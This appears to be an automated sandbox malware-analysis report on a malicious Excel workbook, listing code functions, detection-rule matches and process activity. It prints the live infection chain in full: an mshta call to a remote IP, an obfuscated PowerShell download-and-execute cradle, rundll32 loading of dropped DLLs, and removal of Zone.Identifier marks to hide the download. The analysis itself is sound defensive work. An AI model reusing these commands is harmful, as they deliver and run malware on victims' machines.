                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CCB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CD389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00210E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00200001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00208606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00210C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00206C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00200E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00210056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002020BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00201889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00209EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00205CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002066CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00210F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00204116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00208519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00200B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00202550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00207BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002113AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002109B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00204B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00208BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0020DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00206DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002095FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00209BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00207DD5
                            Source: 4173.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: imedpub_6.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: imedpub_6.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BE249 DeleteService,
                            Source: imedpub_6.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\imedpub_6.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Fjmda\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: imedpub_6.xlsOLE indicator, VBA macros: true
                            Source: imedpub_6.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@21/12@2/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: imedpub_6.xlsOLE indicator, Workbook stream: true
                            Source: imedpub_6.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,
                            Source: imedpub_6.xlsReversingLabs: Detection: 18%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P...............................P.......................`I.........v.....................K........i.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................y0)k....................................}..v............0...............................................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................y0)k..... ..............................}..v....H.......0.................i.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................0)k....................................}..v............0...............................................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................0)k......i.............................}..v............0...............h.i.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................1)k....................................}..v....0.......0...............................................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................1)k......i.............................}..v............0.................i.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............Y.)k....E...............................}..v....p.......0.................i.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............Y.)k....E...............................}..v............0.................i.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............x.......:.......................
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE05F.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: 4173.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032F30CA push 8B4902ADh; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032F30CA push 8B4902ADh; iretd
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: JooSee.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x94782
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg (copy)Jump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
